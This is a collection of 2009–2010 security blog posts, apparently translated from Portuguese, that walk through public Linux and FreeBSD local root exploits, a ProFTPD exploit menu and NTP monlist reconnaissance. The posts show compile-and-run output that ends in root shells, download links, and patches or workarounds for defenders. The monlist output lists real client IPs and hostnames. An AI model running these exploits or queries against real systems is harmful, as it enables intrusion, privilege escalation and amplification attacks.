2010
11.08

By: Kingcope
http://www.exploit-db.com/exploits/15449/

I ran a test on:
FreeBSD 8.1 i386, ProFTPD 1.3.3a
FreeBSD 8.0 i386, ProFTPD 1.3.2a

root@bt:/tmp# perl 15449.pl
written by kingcope
usage:
proremote.pl

[0] FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)
[1] FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)
[2] Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)
[3] Debian GNU/Linux 5.0, ProFTPD 1.3.3 Server (Plesk binary)
[4] Debian GNU/Linux 4.0, ProFTPD 1.3.2e Server (Plesk binary)
[5] Debian Linux Squeeze/sid, ProFTPD 1.3.3a Server (distro binary)
[6] SUSE Linux 9.3, ProFTPD 1.3.2e Server (Plesk binary)
[7] SUSE Linux 10.0/10.3, ProFTPD 1.3.2e Server (Plesk binary)
[8] SUSE Linux 10.2, ProFTPD 1.3.2e Server (Plesk binary)
[9] SUSE Linux 11.0, ProFTPD 1.3.2e Server (Plesk binary)
[10] SUSE Linux 11.1, ProFTPD 1.3.2e Server (Plesk binary)
[11] SUSE Linux SLES 10, ProFTPD 1.3.2e Server (Plesk binary)
[12] CentOS 5, ProFTPD 1.3.2e Server (Plesk binary)

fbsd 8.0:

fbsd 8.1:

Cheers!

2010
10.21

—————–
Advisory Name: Linux RDS Protocol Local Privilege Escalation
Release Date: 2010-10-19
Application: Linux Kernel
Versions: 2.6.30 – 2.6.36-rc8
Severity: High
Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com >
Vendor Status: Patch Released
CVE Candidate: CVE-2010-3904
—————–

Recommendation:

Users should install updates provided by downstream distributions or apply the committed patch and recompile their kernel.
Preventing the RDS kernel module from loading is an effective workaround. This can be accomplished by executing the following command as root:

echo "alias net-pf-21 off" > /etc/modprobe.d/disable-rds
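A way to confirm the workaround is really in effect on a host, as an added example that is not part of the advisory: it checks that some modprobe.d file turns the net-pf-21 alias off and that the rds module is not already loaded, using constructed files in place of /etc/modprobe.d and /proc/modules.

```shell
#!/bin/sh
# Added example, not part of the advisory: verify that the RDS workaround is
# actually in effect on a host. RDS is protocol family 21, so the kernel
# autoloads it through the module alias "net-pf-21", and the advisory's fix
# writes "alias net-pf-21 off" into /etc/modprobe.d/. Both checks take file
# paths as parameters so they can run against the constructed files below
# (on a real host pass /etc/modprobe.d and /proc/modules).

# 0 if some file in the modprobe.d directory turns the net-pf-21 alias off;
# commented-out lines and extra whitespace are handled.
rds_alias_disabled() {
    dir="$1"
    grep -qsE '^[[:space:]]*alias[[:space:]]+net-pf-21[[:space:]]+off([[:space:]]|$)' "$dir"/* 2>/dev/null
}

# 0 if "rds" appears as a module name (first field) in a /proc/modules listing.
rds_module_loaded() {
    awk '$1 == "rds" { found = 1 } END { exit (found ? 0 : 1) }' "$1"
}

# "mitigated" only when the alias is off AND the module is not already loaded
# (turning the alias off does not unload a module that is already in memory).
rds_workaround_status() {
    if rds_alias_disabled "$1" && ! rds_module_loaded "$2"; then
        echo mitigated
    else
        echo unmitigated
    fi
}

# --- constructed demo input (no real host data) ---
demo="$(mktemp -d)"
mkdir -p "$demo/fixed" "$demo/unfixed"
printf '# rds disabled per CVE-2010-3904 advisory\nalias net-pf-21 off\n' > "$demo/fixed/disable-rds"
printf '# alias net-pf-21 off  (commented out: still loadable)\n' > "$demo/unfixed/disable-rds"
printf 'ext4 345088 1 - Live 0xffffffffa0000000\n' > "$demo/modules-clean"
printf 'rds 81920 0 - Live 0xffffffffa0aa0000\next4 345088 1 - Live 0xffffffffa0000000\n' > "$demo/modules-loaded"

echo "fixed host:   $(rds_workaround_status "$demo/fixed" "$demo/modules-clean")"
echo "unfixed host: $(rds_workaround_status "$demo/unfixed" "$demo/modules-loaded")"
```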

Proof-of-Concept Exploit:

http://www.vsecurity.com/download/tools/linux-rds-exploit.c

Testing:

b0t@snow:/tmp$ gcc -o rds linux-rds-exploit.c
b0t@snow:/tmp$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xffffffffa0aab8c0
[+] Resolved rds_ioctl to 0xffffffffa0aa4000
[+] Resolved commit_creds to 0xffffffff810863b0
[+] Resolved prepare_kernel_cred to 0xffffffff81086880
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Got root!
# uname -a
Linux snow 2.6.35-22-generic #34-Ubuntu SMP Sun Oct 10 09:26:05 UTC 2010 x86_64 GNU/Linux
# id
uid=0(root) gid=0(root) groups=0(root)
#

Reference:

http://www.vsecurity.com/resources/advisory/20101019-1/

2010
08.26

Since HD Moore released this tool over the weekend, it has been quite a party in the days that followed...
Every time you hit F5 on http://www.exploit-db.com/ a new piece of software shows up heheh :)

I decided to make a video showing how to use the tool...

More information can be found here:
http://blog.metasploit.com/2010/08/better-faster-stronger.html and here http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

See you!

2010
05.24

This post is a copy-and-paste of an introductory post about SecurityBSD written by Matthew Hughes.
When I saw the project announcement I found it interesting, got in touch with him and decided to take part in it. I hope the project moves forward and that the community contributes a lot as well.
I created an area just for SecurityBSD, which can be reached at http://www.leonardobotelho.com/blog/securitybsd/. There I will be posting project updates as they appear.


Introducing SecurityBSD

We’re all familiar with the FreeBSD operating system. It’s a powerful, UNIX-based operating system that is secure and stable, with a low memory footprint. Introducing SecurityBSD. SecurityBSD is a bundling of the FreeBSD operating system with open source security tools aimed at computer security professionals and enthusiasts, and intends to be a serious contender to the more popular security Linux distributions such as Backtrack Linux, Weaknet Linux and SamuraiWTF.

SecurityBSD can be used on your old beige-box or on the latest computer hardware, it really doesn’t matter. One of the advantages of SecurityBSD is that it is lightweight, and can be used on legacy machines, which will be ideal for enterprises with a small IT security budget, especially in the developing world.

In its current incarnation, there is little to no customization to reflect that it is, in fact, a distribution independent of FreeBSD. It retains FreeBSD branding and the modifications are limited to installations of NMAP and Metasploit. This is an extremely early showcase of what I’m yearning towards with regards to the development of this BSD distribution. Future editions will contain the SecurityBSD project branding and will contain a wide range of security tools.

I’m pretty excited about the development of SecurityBSD, as it offers me an opportunity to learn more about the security tools which my career will be based upon and UNIX, and I’ve got high hopes for it.

A VirtualBox appliance will be posted online in a few days, and I hope that you, the computer security and FreeBSD community, approach this project with the same level of enthusiasm that I have for this project, and turn it into a viable security auditing tool.

Finally, I’d like to express my deepest gratitude to the hundreds who have contributed code to the FreeBSD project and made it possible for me to make SecurityBSD.

Matthew Hughes

Cheers!

2010
04.10

I was looking at the carnal0wnage blog this week and read about a new auxiliary module that HD Moore had released... ntp_monlist

It's neat because it queries NTP servers and lists the last client IPs. The blog also references a post on the SensePost blog... They ran other tests, using the Maltego tool for example, and made some interesting comments:

Have data, what now?
The most immediate application of this method will probably be more revealing footprinting exercises. For example:

  • Certain devices are pre-configured to use a certain ntp server, which one can query to find all those devices
  • Certain products are pre-configured in a similar fashion, e.g. Ubuntu
  • NTP servers could leak internal network details and possibly one of their other addresses (IPv6 or another network if multihomed)
  • IPs that will never show up in customary rDNS and fDNS queries may now suddenly pop up
  • Bandwidth implications: So we know that a busy server’s ‘client cache’ will have 600 entries and wireshark tells us that each result packet is 468 bytes (IP+UDP+NTP). Each result packet only contains 6 results so one is looking at +- 45kbytes of data for each request packet of 220 bytes (IP+UDP+NTP). The NTP server will just dump the data so you will need a sizeable down-link to catch all 100 UDP packets. Moore mentioned that he has developed a technique to create a 30 gigabit/sec DDOS which is not easy to defend against. Our bet is that spoofing the source address of the monlist request may be a way for creating a DDOS attack.

Testing the module, and manually..

Metasploit:

msf > use auxiliary/scanner/ntp/ntp_monlist
msf auxiliary(ntp_monlist) > set RHOSTS a.ntp.br
RHOSTS => a.ntp.br
msf auxiliary(ntp_monlist) > run

[*] Sending probes to 200.160.0.8->200.160.0.8 (1 hosts)
[*] 200.160.0.8:123 201.48.104.130:12559 (200.160.0.8)
[*] 200.160.0.8:123 201.28.104.202:247 (200.160.0.8)
[*] 200.160.0.8:123 201.72.252.178:40 (200.160.0.8)
[*] 200.160.0.8:123 201.16.68.16:1025 (200.160.0.8)
[*] 200.160.0.8:123 189.86.112.61:123 (200.160.0.8)

[*] 200.160.0.8:123 187.12.217.250:57265 (200.160.0.8)
[*] 200.160.0.8:123 187.16.138.10:123 (200.160.0.8)
[*] 200.160.0.8:123 187.16.241.3:55101 (200.160.0.8)
[*] 200.160.0.8:123 189.115.138.116:1626 (200.160.0.8)
[*] 200.160.0.8:123 201.70.200.170:123 (200.160.0.8)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

ntpdc:

root@bt:~# ntpdc -c monlist a.ntp.br
remote address port local address count m ver code avgint lstint
===============================================================================
187.59.59.152.static.h 59959 200.160.0.8 12 7 2 1b0 0 0 (oh, that's me hehe)
200.99.150.227 100 200.160.0.8 11267899 1 3 1b0 0 0
201-28-104-202.custome 337 200.160.0.8 31789 1 3 1b0 0 0
200-140-168-34.pvoce20 62834 200.160.0.8 2688898 3 3 1b0 0 0
189-108-236-228.custom 1100 200.160.0.8 1199 3 4 190 31 0
router.compel.topnet.c 2049 200.160.0.8 1209 3 3 190 10 0
c9526933.virtua.com.br 35899 200.160.0.8 1605526 1 3 1b0 0 0
nataddr.pbh.gov.br 40401 200.160.0.8 21902 3 1 1b0 0 0
189-47-237-9.dsl.teles 123 200.160.0.8 1250 1 3 190 16 0
201.72.252.178 494 200.160.0.8 16435604 1 3 1b0 0 0
201-0-210-224.dial-up. 1323 200.160.0.8 14062 3 3 190 4 0
189.2.161.130 2487 200.160.0.8 13125 6 2 1b0 0 0
firewall.magal.ind.br 25667 200.160.0.8 5866570 1 3 1b0 0 0
autopistalitoralsul36. 354 200.160.0.8 11774 1 3 1b0 0 0
189.38.69.70 30710 200.160.0.8 2 3 3 190 27 0
....
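From the defender's side, the probe that both ntp_monlist and ntpdc -c monlist send is easy to recognise on the wire. The following is an added example (my own code, not from the post, SensePost or the Metasploit module): it decodes the NTP mode 7 header to flag monlist queries in UDP payloads and turns the SensePost bandwidth figures into an amplification estimate. The sample packets are constructed, not captured.

```python
"""Added example (not from the post or the Metasploit module): recognise NTP
mode 7 MON_GETLIST ("monlist") requests in UDP payloads, so a defender can
spot probes like the ntp_monlist / ntpdc -c monlist runs above in a capture,
and put the SensePost bandwidth figures into an amplification estimate."""
from typing import Optional

# Mode 7 (private) header: byte 0 = R|M|version(3)|mode(3), byte 1 = auth bit +
# 7-bit sequence, byte 2 = implementation, byte 3 = request code.
NTP_MODE_PRIVATE = 7
IMPL_XNTPD = 3
REQ_MON_GETLIST = 20       # original monlist request code
REQ_MON_GETLIST_1 = 42     # code sent by ntpdc -c monlist and ntp_monlist


def parse_mode7_header(payload: bytes) -> Optional[dict]:
    """Decode the 4 header bytes, or return None if this is not NTP mode 7."""
    if len(payload) < 8:            # a mode 7 packet is at least 8 bytes
        return None
    b0, b1, impl, reqcode = payload[0], payload[1], payload[2], payload[3]
    if (b0 & 0x07) != NTP_MODE_PRIVATE:
        return None
    return {
        "response": bool(b0 & 0x80),   # R bit: set on replies from the server
        "more": bool(b0 & 0x40),       # M bit: more reply packets follow
        "version": (b0 >> 3) & 0x07,
        "sequence": b1 & 0x7F,
        "implementation": impl,
        "request_code": reqcode,
    }


def is_monlist_request(payload: bytes) -> bool:
    """True for a client -> server monlist query (R bit clear, monlist code)."""
    hdr = parse_mode7_header(payload)
    return (hdr is not None and not hdr["response"]
            and hdr["request_code"] in (REQ_MON_GETLIST, REQ_MON_GETLIST_1))


def amplification_factor(request_bytes: int, reply_packets: int, reply_bytes: int) -> float:
    """Bytes returned per byte sent (the post's 220 B request, 100 x 468 B replies)."""
    return (reply_packets * reply_bytes) / request_bytes


# Constructed sample payloads, not captured traffic: the 8-byte monlist probe
# and an ordinary mode 3 client poll (LI=0, VN=3, mode=3) for contrast.
MONLIST_PROBE = bytes([0x17, 0x00, IMPL_XNTPD, REQ_MON_GETLIST_1]) + b"\x00" * 4
NORMAL_CLIENT = bytes([0x1B]) + b"\x00" * 47

if __name__ == "__main__":
    for name, pkt in (("monlist probe", MONLIST_PROBE), ("normal client", NORMAL_CLIENT)):
        print(f"{name}: monlist request = {is_monlist_request(pkt)}")
    print(f"amplification ~ {amplification_factor(220, 100, 468):.0f}x")
```

Run against the UDP payloads of port 123 traffic, the same check also catches the older request code 20, which the original ntpdc accepts as well.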

Maltego:

Cheers!

Refs:
http://carnal0wnage.attackresearch.com/node/410
http://www.sensepost.com/blog/4552.html
http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html

2010
03.19

Hey there..

This week I watched a pretty interesting webcast about pentesting with Firefox. It covered several add-ons you could be using to help carry out a pentest. Some are well known and others, at least to me, were new. Worth checking out...

Black Hat Webcast: Pen Testing the Web with Firefox (theprez98)
Slides: http://www.scribd.com/doc/28590479/Black-Hat-Webcast-Pen-Testing-the-Web-with-Firefox

You can also take a look at FireCAT (Firefox Catalog of Auditing Toolbox). It is a catalog with a huge list of add-ons that can be installed in Firefox to supercharge the little beast. FireCAT v1.6.2 updated...

Cheers!

2010
01.13

Hello,

After a certain amount of waiting, the final version of BackTrack 4 has been released...

*http://www.offensive-security.com/blog/

BackTrack 4 Final is out and along with this release come some exciting news, updates, and developments. BackTrack 4 has been a long and steady road; with the release of a beta last year, we decided to hold off on releasing BackTrack 4 Final until it was perfected in every way, shape and form.

Besides the many updates made to the system itself, the project has a new "home", will have a new forum, and brings other changes.
Check out the new version here.

Cheers!

2009
12.08

The exploit was published on exploit-db.com on 30/11/2009 and the Security Advisory came out on 03/12/2009, but it doesn't hurt to recall it. :)

*Flaw: Privilege escalation in rtld through environment poisoning. (FreeBSD Brasil)
*System: FreeBSD 7.1, 7.2, 8.0
*Security Advisory: FreeBSD-SA-09:16.rtld
*Exploit: FreeBSD Run-Time Link-Editor Local

Testing the exploit is extremely simple.
Logged in as an unprivileged user, download and run the exploit...

$ uname -a
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
$ ./bsd.sh
bsd.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in function ‘strcpy’
env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#
# id
uid=1001(b0t) gid=1001(b0t) euid=0(root) groups=1001(b0t)

If you haven't updated your system yet, just follow the procedure from the Security Advisory or use freebsd-update.

(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch
(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc
(root@fbsd8) /tmp# cd /usr/src/
(root@fbsd8) /usr/src# patch < /tmp/rtld.patch
(root@fbsd8) /usr/src# cd /usr/src/libexec/rtld-elf/
(root@fbsd8) /usr/src/libexec/rtld-elf# make obj && make depend && make && make install

or

(root@fbsd8) ~# freebsd-update fetch install

Then just test the exploit again...

$ uname -a
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
$
$ ./bsd.sh
bsd.sh env env.c program.c program.o w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in function ‘strcpy’
env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; aborting
$
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)

Cheers!

2009
11.23

Wow.. the news came out in so many places that I got curious and took a look at Google Chrome OS :)
First I created a user and downloaded the image from http://gdgt.com/google/chrome-os/download/. Then I ran the image on a Mac with VirtualBox and tried in several ways to get into the system with my Google account. No luck!

After a bit of "googling", I managed to log into the system with the user chronos (no password):

Now you can log in with your Google account and use the system normally.

We can also do something a bit n00b, but still more fun than opening your e-mail, calendar and so on :P
As we can see, there are no "basic" services running by default:

~# nmap 192.168.1.115

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-23 01:27 BRST
Interesting ports on 192.168.1.115:
Not shown: 999 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
MAC Address: 00:25:00:48:D2:1E (Apple)

Nmap done: 1 IP address (1 host up) scanned in 11.40 seconds

Now in Chrome OS.. we press ctrl+alt+t and get access to the terminal. We type "sudo su" and the password "chronos" to log in as the privileged user.
With that, we can enable the SSH service, for example:

/etc/init.d/ssh start


... and then run nmap again to confirm that the service is running.

~# nmap 192.168.1.115

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-23 02:04 BRST
Interesting ports on 192.168.1.115:
Not shown: 999 filtered ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:25:00:48:D2:1E (Apple)

Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds

Now it's a matter of using the system more and waiting for new versions of it.
That's it.. Cheers :D

2009
11.18

Hello!
Well, since this is news of public interest.. it deserves a post :)

After some time without updates, milw0rm.com will have its place "taken" by another site.
The folks from Offensive Security and Gerix.it will maintain this new exploit repository. In their words, "We've recreated the milw0rm database, updated it and are now accepting submissions."
The site's design/organization is excellent and, besides the exploit itself, you can also download the vulnerable version of the software. The site has the same areas as milw0rm: Remote Exploits, Local Exploits, Web Applications, DoS/PoC, Shellcode and Papers.
Good job! :D

http://exploits.offensive-security.com/
http://twitter.com/exploitdb/
#exploitdb

Now about Metasploit: version 3.3 has been released.
This version includes 446 exploits, 216 auxiliary modules, hundreds of payloads and runs on all modern operating systems, including Linux, Windows, Mac OS X and the BSDs.

Many fixes and improvements have been made since version 3.2:

*The Windows installation now includes a fully-functional console interface…
*The Linux installers now include everything needed to run the Metasploit Framework…
*The Metasploit Console now indicates how many days have passed since the last update…
*The console now supports and enables ANSI colors by default…
*The database functionality is now enabled by default…
*Oracle exploit support has been implemented…
*All TCP-based exploits can now be launched through SOCKS4, SOCKS5, and HTTP proxies…
*Metasploit now supports 64-bit Windows as a target platform…
*Support for JSP payloads has been integrated…

and many other excellent things.

Now just go out and test it and have fun :)

http://blog.metasploit.com/
#metasploit

Cheers!